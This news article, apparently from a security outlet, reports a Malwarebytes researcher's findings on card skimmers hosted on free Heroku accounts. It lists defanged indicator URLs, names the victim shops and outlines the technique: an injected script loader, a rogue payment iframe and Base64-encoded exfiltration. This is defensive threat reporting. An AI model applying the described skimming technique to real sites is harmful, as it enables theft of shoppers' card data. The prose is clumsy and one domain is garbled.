Payment card skimmers used online merchants hosted on Heroku, a cloud provider owned by Salesforce to host their skimmer infrastructure and deliver it to targeted third-party sites.
Jérôme Segura, director of threat intelligence at security provider Malwarebytes, found a rash of skimmers hosted on Heroku, last Wednesday. According to him, payment card skimmers hosted their skimmer infrastructure and collect stolen credit card data. Segura said that after detected suspended accounts, Heroku administrators removed the skimmers quickly. Heroku is especially platform-as-a-service (PaaS) cloud providers that used to support both business and consumer ventures. Users can experiment Heroku’s freemium model with certain limitations.
Injected into merchant sites via free Heroku accounts
Segura wrote in his post last Wednesday,
“We will likely continue to observe Web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it.”
Particularly, he documented four free Heroku accounts hosting scripts that targeted four third-party merchants as:
- stark-gorge-44782.herokuapp[.]com used against shopping site correcttoes[.]com
- ancient-savannah-86049[.]herokuapp[.]com/configration.js used against panafoto[.]com
- pure-peak-91770[.]herokuapp[.]com/intregration.js was used against alashancashmere[.]com
- aqueous-scrubland-51318[.]herokuapp[.]com/configuration.js was used against amapur.]de
iframe trick
The first component of this web skimming app is the iframe trick. A single line of code that loads the remote piece of JavaScript will be injected into compromised merchant sites hosted on Heroku for checking out URL and loading the next component when the current browser URL contains the Base64 encoded string Y2hlY2tvdXQ= (checkout).
Secondly, a rogue iframe that will overlay the standard payment form meant to harvest the victim’s credit card data. The cybercriminals use the same cascading style sheet (CSS) from portal.apsclicktopay.com/css/build/easypay.min.css.
Finally, the exfiltration mechanism for the stolen data that is sent back in encoded format. Users will receive an error message instructing them to reload the page. By the time the message appears, the card has already been compromised.
Vanilla skimming
Malwarebytes detected that in one case, the threat actors may have forgotten to use obfuscation. The code shows vanilla skimming, looking for specific fields to collect and exfiltrate using the window.btoa(JSON.stringify(result)) method.
